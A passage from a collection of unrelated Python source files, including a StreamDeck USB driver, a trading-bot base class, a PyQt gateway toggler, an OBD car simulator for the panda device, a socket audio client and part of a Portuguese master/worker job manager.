USB_VID_ELGATO = 0x0fd9
USB_PID_STREAMDECK = 0x0060
@staticmethod
def _get_transport(transport):
"""
Creates a new HID transport instance from the given transport back-end
name.
:param str transport: Name of a supported HID transport back-end to use.
:rtype: Transport.* instance
:return: Instance of a HID Transport class
"""
if transport == "hidapi":
from .Transport.HIDAPI import HIDAPI
return HIDAPI()
else:
raise IOError("Invalid HID transport backend \"{}\".".format(transport))
def __init__(self, transport="hidapi"):
"""
Creates a new StreamDeck DeviceManager, used to detect attached StreamDeck devices.
:param str transport: name of the the HID transport backend to use
"""
self.transport = self._get_transport(transport)
def enumerate(self):
"""
Detect attached StreamDeck devices.
:rtype: list(StreamDeck)
:return: list of :class:`StreamDeck` instances, one for each detected device.
"""
deck_devices = self.transport.enumerate(
vid=self.USB_VID_ELGATO, pid=self.USB_PID_STREAMDECK)
return [StreamDeck(d) for d in deck_devices]
class StreamDeck(object):
"""
Represents a physically attached StreamDeck device.
"""
KEY_COUNT = 15
KEY_COLS = 5
KEY_ROWS = 3
KEY_PIXEL_WIDTH = 72
KEY_PIXEL_HEIGHT = 72
KEY_PIXEL_DEPTH = 3
KEY_PIXEL_ORDER = "BGR"
KEY_IMAGE_SIZE = KEY_PIXEL_WIDTH * KEY_PIXEL_HEIGHT * KEY_PIXEL_DEPTH
def __init__(self, device):
self.device = device
self.last_key_states = [False] * self.KEY_COUNT
self.read_thread = None
self.key_callback = None
def __del__(self):
"""
Deletion handler for the StreamDeck, automatically closing the transport
if it is currently open and terminating the transport reader thread.
"""
try:
self._setup_reader(None)
self.device.close()
except Exception:
pass
def _read(self):
"""
Read handler for the underlying transport, listening for button state
changes on the underlying device, caching the new states and firing off
any registered callbacks.
"""
while self.read_thread_run:
payload = []
try:
payload = self.device.read(17)
except ValueError:
self.read_thread_run = False
if len(payload):
new_key_states = [bool(s) for s in payload[1:]]
if self.key_callback is not None:
for k, (old, new) in enumerate(zip(self.last_key_states, new_key_states)):
if old != new:
self.key_callback(self, k, new)
self.last_key_states = new_key_states
def _setup_reader(self, callback):
"""
Sets up the internal transport reader thread with the given callback,
for asynchronous processing of HID events from the device. IF the thread
already exists, it is terminated and restarted with the new callback
function.
:param function callback: Callback to run on the reader thread.
"""
if self.read_thread is not None:
self.read_thread_run = False
self.read_thread.join()
if callback is not None:
self.read_thread_run = True
self.read_thread = threading.Thread(target=callback)
self.read_thread.daemon = True
self.read_thread.start()
def open(self):
"""
Opens the device for input/output. This must be called prior to setting
or retrieving any device state.
.. seealso:: See :func:`~StreamDeck.close` for the corresponding close method.
"""
self.device.open()
self._setup_reader(self._read)
def close(self):
"""
Closes the device for input/output.
.. seealso:: See :func:`~StreamDeck.open` for the corresponding open method.
"""
self.device.close()
def connected(self):
"""
Indicates if the physical StreamDeck device this instance is attached to
is still connected to the host.
:rtype: bool
:return: `True` if the deck is still connected, `False` otherwise.
"""
return self.device.connected()
def id(self):
"""
Retrieves the physical ID of the attached StreamDeck. This can be used
to differentiate one StreamDeck from another.
:rtype: str
:return: Identifier for the attached device.
"""
return self.device.path()
def key_count(self):
"""
Retrieves number of physical buttons on the attached StreamDeck device.
:rtype: int
:return: Number of physical buttons.
"""
return self.KEY_COUNT
def key_layout(self):
"""
Retrieves the physical button layout on the attached StreamDeck device.
:rtype: (int, int)
:return (rows, columns): Number of button rows and columns.
"""
return self.KEY_ROWS, self.KEY_COLS
def key_image_format(self):
"""
Retrieves the image format accepted by the attached StreamDeck device.
Images should be given in this format when setting an image on a button.
.. seealso:: See :func:`~StreamDeck.set_key_image` method to update the
image displayed on a StreamDeck button.
:rtype: dict()
:return: Dictionary describing the various image parameters
(width, height, pixel depth and RGB order).
"""
return {
"width": self.KEY_PIXEL_WIDTH,
"height": self.KEY_PIXEL_HEIGHT,
"depth": self.KEY_PIXEL_DEPTH,
"order": self.KEY_PIXEL_ORDER,
}
def reset(self):
"""
Resets the StreamDeck, clearing all button images and showing the
standby image.
"""
payload = bytearray(17)
payload[0:2] = [0x0B, 0x63]
self.device.write_feature(payload)
def set_brightness(self, percent):
"""
Sets the global screen brightness of the ScreenDeck, across all the
physical buttons.
:param int/float percent: brightness percent, from [0-100] as an `int`,
or normalized to [0.0-1.0] as a `float`.
"""
if type(percent) is float:
percent = int(100.0 * percent)
percent = min(max(percent, 0), 100)
payload = bytearray(17)
payload[0:6] = [0x05, 0x55, 0xaa, 0xd1, 0x01, percent]
self.device.write_feature(payload)
def set_key_image(self, key, image):
"""
Sets the image of a button on the StremDeck to the given image. The
image being set should be in the correct format for the device, as an
enumerable collection of pixels.
.. seealso:: See :func:`~StreamDeck.get_key_image_format` method for
information on the image format accepted by the device.
:param int key: Index of the button whose image is to be updated.
:param enumerable image: Pixel data of the image to set on the button.
If `None`, the key will be cleared to a black
color.
"""
image = bytes(image or self.KEY_IMAGE_SIZE)
if min(max(key, 0), self.KEY_COUNT) != key:
raise IndexError("Invalid key index {}.".format(key))
if len(image) != self.KEY_IMAGE_SIZE:
raise ValueError("Invalid image size {}.".format(len(image)))
header_1 = [
0x02, 0x01, 0x01, 0x00, 0x00, key + 1, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x42, 0x4d, 0xf6, 0x3c, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x28, 0x00,
0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x48, 0x00,
0x00, 0x00, 0x01, 0x00, 0x18, 0x00, 0x00, 0x00,
0x00, 0x00, 0xc0, 0x3c, 0x00, 0x00, 0xc4, 0x0e,
0x00, 0x00, 0xc4, 0x0e, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00
]
header_2 = [
0x02, 0x01, 0x02, 0x00, 0x01, key + 1, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
]
IMAGE_BYTES_PAGE_1 = 2583 * 3
payload_1 = bytes(header_1) + image[: IMAGE_BYTES_PAGE_1]
payload_2 = bytes(header_2) + image[IMAGE_BYTES_PAGE_1:]
self.device.write(payload_1)
self.device.write(payload_2)
def set_key_callback(self, callback):
"""
Sets the callback function called each time a button on the StreamDeck
changes state (either pressed, or released).
.. note:: This callback will be fired from an internal reader thread.
Ensure that the given callback function is thread-safe.
.. note:: Only one callback can be registered at one time.
.. seealso:: See :func:`~StreamDeck.set_key_callback_async` method for
a version compatible with Python 3 `asyncio` asynchronous
functions.
:param function callback: Callback function to fire each time a button
state changes.
"""
self.key_callback = callback
def set_key_callback_async(self, async_callback, loop=None):
"""
Sets the asynchronous callback function called each time a button on the
StreamDeck changes state (either pressed, or released). The given
callback should be compatible with Python 3's `asyncio` routines.
.. note:: The asynchronous callback will be fired in a thread-safe
manner.
.. note:: This will override the callback (if any) set by
:func:`~StreamDeck.set_key_callback`.
:param function async_callback: Asynchronous callback function to fire
each time a button state changes.
:param function loop: Asyncio loop to dispatch the callback into
"""
import asyncio
loop = loop or asyncio.get_event_loop()
def callback(*args):
asyncio.run_coroutine_threadsafe(async_callback(*args), loop)
self.set_key_callback(callback)
def key_states(self):
"""
Retrieves the current states of the buttons on the StreamDeck.
:rtype: list(bool)
:return: List describing the current states of each of the buttons on
the device (`True` if the button is being pressed,
`False` otherwise).
"""
return self.last_key_states
|
basestrat.py
|
import multiprocessing as mp
import time
import threading
import datetime
'''
How to use:
use the longshort class as an example.
In the __init__ funciton, include a call to
super().__init__(pipe,logger,alpaca)
this will take care of the pipeline creation
To send a message to the user directly, use self.talk()
To store messages in a queue to burst after a certain point,
(useful in case of too many messages) use self.m_queue.add_msg()
and it will take care of sending the message on its own
(after it stacks to 10 messages)
To make sure the running loops are terminated,
use self.stop as a checking parameter (ex. 'while not self.stop')
and use self.killcheck() to terminate the listener correctly.
Whenever sleep calls are necessary, use self.asleep() instead.
This will ensure the termination happens immediately rather than
waiting on the sleep call to finish
To check if market is open (and wait if it is not), call self.checkMarketOpen()
This function will keep everything on hold if market is not open, and will pass if it is open
'''
class BaseStrat:
def __init__(self, pipe, logger, alpaca):
print('base class here')
self.pipe = pipe
self.stop = False
self.logger = logger
self.alpaca = alpaca
self.listener = threading.Thread(target= self.waiter_thread)
self.m_queue = message_queue(self.pipe)
self.listener.start()
print('started listner')
def waiter_thread(self):
while True:
if self.pipe.has_data():
msg = self.pipe.read()
if msg == 'kill':
print('kill signal received from discord')
self.logger.info('Algo: kill signal received from discord')
self.kill()
return
else:
# add additional parameters in here
print("discord said something!")
def talk(self,msg):
self.pipe.send(msg)
def kill(self):
self.talk("wrapping up...")
self.logger.info("Algo: Setting stop to true..")
self.stop = True
def killcheck(self):
if self.stop:
print('killing listener first')
self.listener.join()
self.logger.info("Algo: listener successfully terminated")
def asleep(self,t):
# im gonna replace all the time sleep calls with this so that
# the thread doesnt sleep when the user wants it to die
counter = 0
while not self.stop and counter < t:
time.sleep(1)
counter += 1
self.logger.info('Algo: This guy tried to sleep but he ain\'t slick')
def checkMarketOpen(self):
tAMO = threading.Thread(target=self.awaitMarketOpen)
tAMO.start()
tAMO.join()
def awaitMarketOpen(self):
isOpen = self.alpaca.get_clock().is_open
while not isOpen and not self.stop:
clock = self.alpaca.get_clock()
openingTime = clock.next_open.replace(tzinfo=datetime.timezone.utc).timestamp()
currTime = clock.timestamp.replace(tzinfo=datetime.timezone.utc).timestamp()
timeToOpen = int((openingTime - currTime) / 60)
self.m_queue.add_msg(str(timeToOpen) + " minutes til market open.")
self.asleep(60 * 5)
# five minutes
isOpen = self.alpaca.get_clock().is_open
self.killcheck()
class message_queue:
def __init__(self, pipe):
self.message = ''
self.msg_count = 0
self.pipe = pipe
def add_msg(self, msg):
print('added message to queue:',msg,self.msg_count,'out of 10')
self.message += msg + '\n'
self.msg_count += 1
if self.msg_count == 10:
self.pipe.send(self.message)
self.message = ''
self.msg_count = 0
|
gatewayTogglerClient1.py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'gatewayToggler.ui'
#
# Created by: PyQt5 UI code generator 5.13.0
#
# WARNING! All changes made in this file will be lost!
import socket
import sys
import threading
from PyQt5 import QtCore, QtGui, QtWidgets
from config import DeviceConfig, GatewayConfig
from socketUtil import socketServerStart
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Device Id :-"+CLIENT_ID)
Dialog.resize(400, 300)
self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
self.buttonBox.setGeometry(QtCore.QRect(30, 240, 341, 32))
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.pushButton = QtWidgets.QPushButton(Dialog)
self.pushButton.setGeometry(QtCore.QRect(120, 20, 131, 31))
self.pushButton.setCheckable(False)
self.pushButton.setObjectName("pushButton")
self.pushButton.clicked.connect(lambda:self.changeGatewayOnClick(self.pushButton))
self.pushButton_2 = QtWidgets.QPushButton(Dialog)
self.pushButton_2.setGeometry(QtCore.QRect(120, 70, 131, 41))
self.pushButton_2.setObjectName("pushButton_2")
self.pushButton_2.clicked.connect(lambda:self.changeGatewayOnClick(self.pushButton_2))
self.pushButton_3 = QtWidgets.QPushButton(Dialog)
self.pushButton_3.setGeometry(QtCore.QRect(40, 140, 75, 41))
self.pushButton_3.setObjectName("pushButton_3")
self.pushButton_3.clicked.connect(lambda:self.changeGatewayOnClick(self.pushButton_3))
self.pushButton_4 = QtWidgets.QPushButton(Dialog)
self.pushButton_4.setGeometry(QtCore.QRect(244, 142, 91, 41))
self.pushButton_4.setObjectName("pushButton_4")
self.pushButton_4.clicked.connect(lambda:self.changeGatewayOnClick(self.pushButton_4))
self.retranslateUi(Dialog)
self.buttonBox.accepted.connect(Dialog.accept)
self.buttonBox.rejected.connect(Dialog.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Device Id :- "+CLIENT_ID))
self.pushButton.setText(_translate("Dialog", "Factory"))
self.pushButton_2.setText(_translate("Dialog", "Warehouse"))
self.pushButton_3.setText(_translate("Dialog", "Store_A"))
self.pushButton_4.setText(_translate("Dialog", "Store_B"))
def changeGatewayOnClick(self,gatewayName):
print( "Changing gateway to "+gatewayName.text())
gatewayPort = GatewayConfig[gatewayName.text()]
s = socket.socket()
s.connect(('127.0.0.1',gatewayPort))
s.send(CLIENT_ID.encode())
s.close()
CLIENT_ID = 'client1'
#Asynchronously listen to socket from server
server_port = DeviceConfig[CLIENT_ID]
x = threading.Thread(target=socketServerStart, args=[server_port], daemon=True)
x.start()
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
app = QtWidgets.QApplication(sys.argv)
Dialog = QtWidgets.QDialog()
ui = Ui_Dialog()
ui.setupUi(Dialog)
Dialog.show()
sys.exit(app.exec_())
|
elm_car_simulator.py
|
#!/usr/bin/env python3
"""Used to Reverse/Test ELM protocol auto detect and OBD message response without a car."""
import sys
import os
import struct
import binascii
import time
import threading
from collections import deque
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), ".."))
from panda import Panda
def lin_checksum(dat):
return sum(dat) % 0x100
class ELMCarSimulator():
def __init__(self, sn, silent=False, can_kbaud=500,
can=True, can11b=True, can29b=True,
lin=True):
self.__p = Panda(sn if sn else Panda.list()[0])
self.__on = True
self.__stop = False
self.__silent = silent
self.__lin_timer = None
self.__lin_active = False
self.__lin_enable = lin
self.__lin_monitor_thread = threading.Thread(target=self.__lin_monitor)
self.__can_multipart_data = None
self.__can_kbaud = can_kbaud
self.__can_extra_noise_msgs = deque()
self.__can_enable = can
self.__can11b = can11b
self.__can29b = can29b
self.__can_monitor_thread = threading.Thread(target=self.__can_monitor)
@property
def panda(self):
return self.__p
def stop(self):
if self.__lin_timer:
self.__lin_timer.cancel()
self.__lin_timeout_handler()
self.__stop = True
def join(self):
if self.__lin_monitor_thread.is_alive():
self.__lin_monitor_thread.join()
if self.__can_monitor_thread.is_alive():
self.__can_monitor_thread.join()
if self.__p:
print("closing handle")
self.__p.close()
def set_enable(self, on):
self.__on = on
def start(self):
self.panda.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
if self.__lin_enable:
self.__lin_monitor_thread.start()
if self.__can_enable:
self.__can_monitor_thread.start()
#########################
# LIN related functions #
#########################
def __lin_monitor(self):
print("STARTING LIN THREAD")
self.panda.set_uart_baud(2, 10400)
self.panda.kline_drain() # Toss whatever was already there
lin_buff = bytearray()
while not self.__stop:
lin_msg = self.panda.serial_read(2)
if not lin_msg:
continue
lin_buff += lin_msg
#print(" ** Buff", lin_buff)
if lin_buff.endswith(b'\x00\xc1\x33\xf1\x81\x66'): # Leading 0 is wakeup
lin_buff = bytearray()
self.__lin_active = True
print("GOT LIN (KWP FAST) WAKEUP SIGNAL")
self._lin_send(0x10, b'\xC1\x8F\xE9')
self.__reset_lin_timeout()
continue
if self.__lin_active:
msglen = lin_buff[0] & 0x7
if lin_buff[0] & 0xF8 not in (0x80, 0xC0):
print("Invalid bytes at start of message")
print(" BUFF", lin_buff)
continue
if len(lin_buff) < msglen + 4: continue
if lin_checksum(lin_buff[:-1]) != lin_buff[-1]: continue
self.__lin_process_msg(lin_buff[0] & 0xF8, #Priority
lin_buff[1], lin_buff[2], lin_buff[3:-1])
lin_buff = bytearray()
def _lin_send(self, to_addr, msg):
if not self.__silent:
print(" LIN Reply (%x)" % to_addr, binascii.hexlify(msg))
PHYS_ADDR = 0x80
#FUNC_ADDR = 0xC0
RECV = 0xF1
#SEND = 0x33 # Car OBD Functional Address
headers = struct.pack("BBB", PHYS_ADDR | len(msg), RECV, to_addr)
if not self.__silent:
print(" Sending LIN", binascii.hexlify(headers+msg),
hex(sum(bytearray(headers+msg))%0x100))
self.panda.kline_send(headers + msg)
def __reset_lin_timeout(self):
if self.__lin_timer:
self.__lin_timer.cancel()
self.__lin_timer = threading.Timer(5, self.__lin_timeout_handler)
self.__lin_timer.start()
def __lin_timeout_handler(self):
print("LIN TIMEOUT")
self.__lin_timer = None
self.__lin_active = False
@property
def lin_active(self):
return self.__lin_active
def __lin_process_msg(self, priority, toaddr, fromaddr, data):
self.__reset_lin_timeout()
if not self.__silent and data != b'\x3E':
print("LIN MSG", "Addr:", hex(toaddr), "obdLen:", len(data),
binascii.hexlify(data))
outmsg = None
#if data == b'\x3E':
# print("KEEP ALIVE")
#el
if len(data) > 1:
outmsg = self._process_obd(data[0], data[1])
if outmsg:
obd_header = struct.pack("BB", 0x40 | data[0], data[1])
if len(outmsg) <= 5:
self._lin_send(0x10, obd_header + outmsg)
else:
first_msg_len = min(4, len(outmsg)%4) or 4
self._lin_send(0x10, obd_header + b'\x01' +
b'\x00'*(4-first_msg_len) +
outmsg[:first_msg_len])
for num, i in enumerate(range(first_msg_len, len(outmsg), 4)):
self._lin_send(0x10, obd_header +
struct.pack('B', (num+2)%0x100) + outmsg[i:i+4])
#########################
# CAN related functions #
#########################
def __can_monitor(self):
print("STARTING CAN THREAD")
self.panda.set_can_speed_kbps(0, self.__can_kbaud)
self.panda.can_recv() # Toss whatever was already there
while not self.__stop:
for address, ts, data, src in self.panda.can_recv():
if self.__on and src == 0 and len(data) == 8 and data[0] >= 2:
if not self.__silent:
print("Processing CAN message", src, hex(address), binascii.hexlify(data))
self.__can_process_msg(data[1], data[2], address, ts, data, src)
elif not self.__silent:
print("Rejecting CAN message", src, hex(address), binascii.hexlify(data))
def can_mode_11b(self):
self.__can11b = True
self.__can29b = False
def can_mode_29b(self):
self.__can11b = False
self.__can29b = True
def can_mode_11b_29b(self):
self.__can11b = True
self.__can29b = True
def change_can_baud(self, kbaud):
self.__can_kbaud = kbaud
self.panda.set_can_speed_kbps(0, self.__can_kbaud)
def can_add_extra_noise(self, noise_msg, addr=None):
self.__can_extra_noise_msgs.append((addr, noise_msg))
def _can_send(self, addr, msg):
if not self.__silent:
print(" CAN Reply (%x)" % addr, binascii.hexlify(msg))
self.panda.can_send(addr, msg + b'\x00'*(8-len(msg)), 0)
if self.__can_extra_noise_msgs:
noise = self.__can_extra_noise_msgs.popleft()
self.panda.can_send(noise[0] if noise[0] is not None else addr,
noise[1] + b'\x00'*(8-len(noise[1])), 0)
def _can_addr_matches(self, addr):
if self.__can11b and (addr == 0x7DF or (addr & 0x7F8) == 0x7E0):
return True
if self.__can29b and (addr == 0x18db33f1 or (addr & 0x1FFF00FF) == 0x18da00f1):
return True
return False
def __can_process_msg(self, mode, pid, address, ts, data, src):
if not self.__silent:
print("CAN MSG", binascii.hexlify(data[1:1+data[0]]),
"Addr:", hex(address), "Mode:", hex(mode)[2:].zfill(2),
"PID:", hex(pid)[2:].zfill(2), "canLen:", len(data),
binascii.hexlify(data))
if self._can_addr_matches(address) and len(data) == 8:
outmsg = None
if data[:3] == b'\x30\x00\x00' and len(self.__can_multipart_data):
if not self.__silent:
print("Request for more data");
outaddr = 0x7E8 if address == 0x7DF or address == 0x7E0 else 0x18DAF110
msgnum = 1
while(self.__can_multipart_data):
datalen = min(7, len(self.__can_multipart_data))
msgpiece = struct.pack("B", 0x20 | msgnum) + self.__can_multipart_data[:datalen]
self._can_send(outaddr, msgpiece)
self.__can_multipart_data = self.__can_multipart_data[7:]
msgnum = (msgnum+1)%0x10
time.sleep(0.01)
else:
outmsg = self._process_obd(mode, pid)
if outmsg:
outaddr = 0x7E8 if address == 0x7DF or address == 0x7E0 else 0x18DAF110
if len(outmsg) <= 5:
self._can_send(outaddr,
struct.pack("BBB", len(outmsg)+2, 0x40|data[1], pid) + outmsg)
else:
first_msg_len = min(3, len(outmsg)%7)
payload_len = len(outmsg)+3
msgpiece = struct.pack("BBBBB", 0x10 | ((payload_len>>8)&0xF),
payload_len&0xFF,
0x40|data[1], pid, 1) + outmsg[:first_msg_len]
self._can_send(outaddr, msgpiece)
self.__can_multipart_data = outmsg[first_msg_len:]
#########################
# General OBD functions #
#########################
def _process_obd(self, mode, pid):
if mode == 0x01: # Mode: Show current data
if pid == 0x00: #List supported things
return b"\xff\xff\xff\xfe"#b"\xBE\x1F\xB8\x10" #Bitfield, random features
elif pid == 0x01: # Monitor Status since DTC cleared
return b"\x00\x00\x00\x00" #Bitfield, random features
elif pid == 0x04: # Calculated engine load
return b"\x2f"
elif pid == 0x05: # Engine coolant temperature
return b"\x3c"
elif pid == 0x0B: # Intake manifold absolute pressure
return b"\x90"
elif pid == 0x0C: # Engine RPM
return b"\x1A\xF8"
elif pid == 0x0D: # Vehicle Speed
return b"\x53"
elif pid == 0x10: # MAF air flow rate
return b"\x01\xA0"
elif pid == 0x11: # Throttle Position
return b"\x90"
elif pid == 0x33: # Absolute Barometric Pressure
return b"\x90"
elif mode == 0x09: # Mode: Request vehicle information
if pid == 0x02: # Show VIN
return b"1D4GP00R55B123456"
if pid == 0xFC: # test long multi message. Ligned up for LIN responses
return b''.join((struct.pack(">BBH", 0xAA, 0xAA, num+1) for num in range(80)))
if pid == 0xFD: # test long multi message
parts = (b'\xAA\xAA\xAA' + struct.pack(">I", num) for num in range(80))
return b'\xAA\xAA\xAA' + b''.join(parts)
if pid == 0xFE: # test very long multi message
parts = (b'\xAA\xAA\xAA' + struct.pack(">I", num) for num in range(584))
return b'\xAA\xAA\xAA' + b''.join(parts) + b'\xAA'
if pid == 0xFF:
return b'\xAA\x00\x00' +\
b"".join(((b'\xAA'*5)+struct.pack(">H", num+1) for num in range(584)))
#return b"\xAA"*100#(0xFFF-3)
if __name__ == "__main__":
serial = os.getenv("SERIAL") if os.getenv("SERIAL") else None
kbaud = int(os.getenv("CANKBAUD")) if os.getenv("CANKBAUD") else 500 # type: ignore
bitwidth = int(os.getenv("CANBITWIDTH")) if os.getenv("CANBITWIDTH") else 0 # type: ignore
canenable = bool(int(os.getenv("CANENABLE"))) if os.getenv("CANENABLE") else True # type: ignore
linenable = bool(int(os.getenv("LINENABLE"))) if os.getenv("LINENABLE") else True # type: ignore
sim = ELMCarSimulator(serial, can_kbaud=kbaud, can=canenable, lin=linenable)
if(bitwidth == 0):
sim.can_mode_11b_29b()
if(bitwidth == 11):
sim.can_mode_11b()
if(bitwidth == 29):
sim.can_mode_29b()
import signal
def signal_handler(signal, frame):
print('\nShutting down simulator')
sim.stop()
sim.join()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
sim.start()
signal.pause()
|
doctor.py
|
import socket
import threading
import pyaudio
import sys
class Client:
def __init__(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while 1:
try:
self.target_ip = input('Enter IP address of server --> ')
self.target_port = int(input('Enter target port of server --> '))
self.s.connect((self.target_ip, self.target_port))
break
except:
print("Couldn't connect to server")
chunk_size = 1024 # 512
audio_format = pyaudio.paInt16
channels = 1
rate = 2048
# initialise microphone recording
self.p = pyaudio.PyAudio()
self.playing_stream = self.p.open(format=audio_format, channels=channels, rate=rate, output=True, frames_per_buffer=chunk_size)
#self.recording_stream = self.p.open(format=audio_format, channels=channels, rate=rate, input=True, frames_per_buffer=chunk_size)
print("Connected to Server")
# start threads
receive_thread = threading.Thread(target=self.receive_server_data).start()
#self.send_data_to_server()
def receive_server_data(self):
while True:
try:
data = self.s.recv(2096)
#print(sys.getsizeof(data))
self.playing_stream.write(data)
except:
pass
client = Client()
|
multiprocess.py
|
import time
from multiprocessing import Process,Manager,Value
class test:
def __init__(self):
self.manager = Manager()
# self.cache = self.manager.list()
self.token = self.manager.Value('i',0)
self.s_time = time.time()
def func1(self):
while True:
self.token.value += 1
if self.token.value >= 10:
# print("too many requests received")
pass
else:
print("hello world")
def func2(self):
while True:
if time.time() - self.s_time >= 5:
print("TIME: ",time.time() - self.s_time >= 5)
# self.cache[:] = []
self.token.value = 0
print(self.token.value)
self.s_time = time.time()
if __name__ == '__main__':
Test = test()
p2 = Process(target=Test.func1)
p2.start()
p1 = Process(target=Test.func2)
p1.start()
p2.join()
p1.join()
|
mestre.py
|
#!/usr/bin/python
import subprocess
import shlex
import string
import time
import itertools
import os
import urllib
import json
import urllib2
import types
from pprint import pprint
from threading import Thread
from escravo import GerenciadorEscravo
# pertence ao no Mestre
class ProcessoDesc:
id = 0
init_time = ''
status = 'wait' # wait, running, killed, finished
def __init__(self, id=0, init_time='',status='wait'):
self.id = id
self.init_time = init_time
self.status = status # wait, running, killed, finished
# pertence ao no Mestre
class Escravo:
id = 0
ip = "0.0.0.0"
lista_processo = []
# pp eh o max de processos q este no suporta
pp = 1
live = False
thread = None
def __init__(self, id=0, ip='0.0.0.0',pp=1):
self.id = id
self.ip = ip
self.pp = pp
self.live = True
#self.processando = False
""" {
processo: [
{
id=0,
init_time=2011-03-13 20:01:32,
status = 'runing'
},
{
...
}
]
}
"""
def getProcessos(self, json):
# analisar json
# self.lista_processo.append(new ProcessoDesc(id,init_time,status))
print json
def getAlive(self,):
if isinstance(self.thread,types.NoneType):
return False
else:
return self.thread.is_alive()
# pertence ao no Escravo
class GerenciadorMestre:
id = 0
ip = None
port = None
flagProcesso = False
itera_count = 0
escravo_count = 0
lista_escravo = []
nfs_path = None
#base_init = ''
parametros = ''
Gprocess_count = 0
process_count = 0 # contador de processos instanciados, zera quando inicializa processamento
total_pro = 0 # valor setado na inicializacao do mestre(interface web)
fase01 = ''
fase02 = ''
fase03 = ''
execFase = 0 # fase01 -> 1, fase02 -> 2, fase03 -> 3, fim -> 4
threadProcessamento = None
'''
def __init__(self, nfs_path='', ip='0.0.0.0', port=8080):
self.nfs_path = nfs_path
self.ip = ip
self.port = port
# inicializar webservice?
# contactar servidor principal?
'''
'''
def getProcessosStatus(self):
"""
verificar lista_processo
pegar status de cada processo
e montar json
"""
json = []
json.append('{ processo: [')
i=0
for processo in self.lista_processo:
if i==1:
json.append(',')
json.append('{ id:'+str(processo.processo.pid)+',')
json.append('init_time:'+time.strftime("%Y-%m-%d %H:%M:%S")+',')
if processo.processo.poll() == None:
json.append("status: 'runing'")
else:
json.append("status: 'finished'")
i=1
json.append('}')
json.append(']}')
return "".join(json)
def getProcesso(self, id=0):
return lista_processo[id]
def setProcesso(self, cmd=''):
self.lista_processo.append(Processo(self.process_count+1, '','wait',cmd))
#inicializa processo
#print cmd
def startProcessos(self):
for processo in self.lista_processo:
print 'Iniciando processo: '+str(processo.id)
processo.executar()
'''
def getTotalProcessos(self,x):
res = len(self.parametros)
if res > x:
return x
else:
return res
def MyHttpRequest(self,url,wait_result=True):
#esse metodo precisa garantir que a solicitacao tera uma resposta!
response=''
if url.find('http://')>=0:
url = urllib2.Request(url)
try:
response = urllib2.urlopen(url)
if(wait_result):
response = response.read()
else:
response.close()
return response
except urllib2.HTTPError:
return ''
except urllib2.URLError:
return ''
else:
return ''
def getSetup(self):
if isinstance(self.nfs_path,types.NoneType) and isinstance(self.ip,types.NoneType) and isinstance(self.port,types.NoneType):
return True
return False
def setSetup(self, nfs_path='', ip='0.0.0.0', port=8080):
self.nfs_path = nfs_path
self.ip = ip
#print 'setSetup '+str(port)
self.port = port
def getEscravoProcessando(self):
for escravo in self.lista_escravo:
if escravo.getAlive():
return True
# se passar por todos e nao encontrar nenhum processando
return False
def getStatusProcesso(self):
pass
def analisa(self,query=''):
#myvars = {'metodo':None, 'cmd':None, 'id':None, 'nfs_path':None, 'num_process':None, 'server_ip':None}
myvars = {}
#myvars = {'status': 'false'}
'''
ge = GerenciadorEscravo()
print 'ge.getSetup() '+str(ge.getSetup())
'''
query = query.replace('%20',' ')
query = query.replace('%27',"'")
query = string.split(query, '?')
if(len(query)>1):
if(query[0]=='/managerpp/ajax'):
if(query[1]!=None):
query = string.split(query[1], '&')
print query
for vars in query:
aux = string.split(vars, '=')
myvars[aux[0]] = aux[1]
print myvars
if myvars != None:
if myvars.get('metodo',False):
print 'Metodo: '+str(myvars.get('metodo'))
'''
if myvars.get('metodo') == 'setprocesso':
if myvars.get('pp',False):
for i in range(0, int(myvars.get('pp'))):
print i
if myvars.get('cmd',False):
self.setProcesso(myvars['cmd'])
myvars['status'] = 'true'
else:
myvars['status'] = 'false'
else:
if myvars.get('cmd',False):
self.setProcesso(myvars['cmd'])
myvars['status'] = 'true'
elif myvars.get('metodo') == 'getprocessosstatus':
self.getProcessosStatus()
elif myvars.get('metodo') == 'startprocessos':
self.startProcessos()
elif myvars.get('metodo') == 'getprocesso':
if myvars.get('id',False):
self.getProcesso(myvars['id'])
'''
if myvars.get('metodo') == 'escravos':
#jsonvars = {escravos:[{id:1,ip:'10.0.0.1',pp:10},{id:2,ip:'10.0.0.2',pp:11}]}
myjson = []
myjson.append('{ "escravos": [')
i=0
print 'length(self.lista_escravo)'+str(len(self.lista_escravo))
for escravo in self.lista_escravo:
#print processo
if i==1:
myjson.append(',')
print 'id: '+str(escravo.id)
myjson.append('{ "id":'+str(escravo.id)+',')
print 'ip: '+str(escravo.ip)
myjson.append('"ip":"'+escravo.ip+'",')
print 'pp: '+str(escravo.pp)
myjson.append('"pp": "'+str(escravo.pp)+'"')
i=1
myjson.append('}')
myjson.append(']}')
return "".join(myjson)
pass
elif myvars.get('metodo') == 'status':
# verificar no existentes
# 0 no == status -> false
if len(self.lista_escravo)>0:
# Falta testar se nos ativos
myvars["status"] = 'true'
myvars["count_no"] = len(self.lista_escravo)
else:
myvars["status"] = 'false'
#self.ip, self.port = self.client_address
myvars["ip"] = self.ip
print str(self.port)
myvars["port"] = str(self.port)
elif myvars.get('metodo') == 'initstatus':
if self.flagProcesso:
if not self.threadProcessamento.is_alive():
self.flagProcesso = False
myvars["processando"] = 'false'
myvars["path_ini"] = 'false'
myvars["status"] = 'false'
else:
myvars["fase01"] = self.fase01
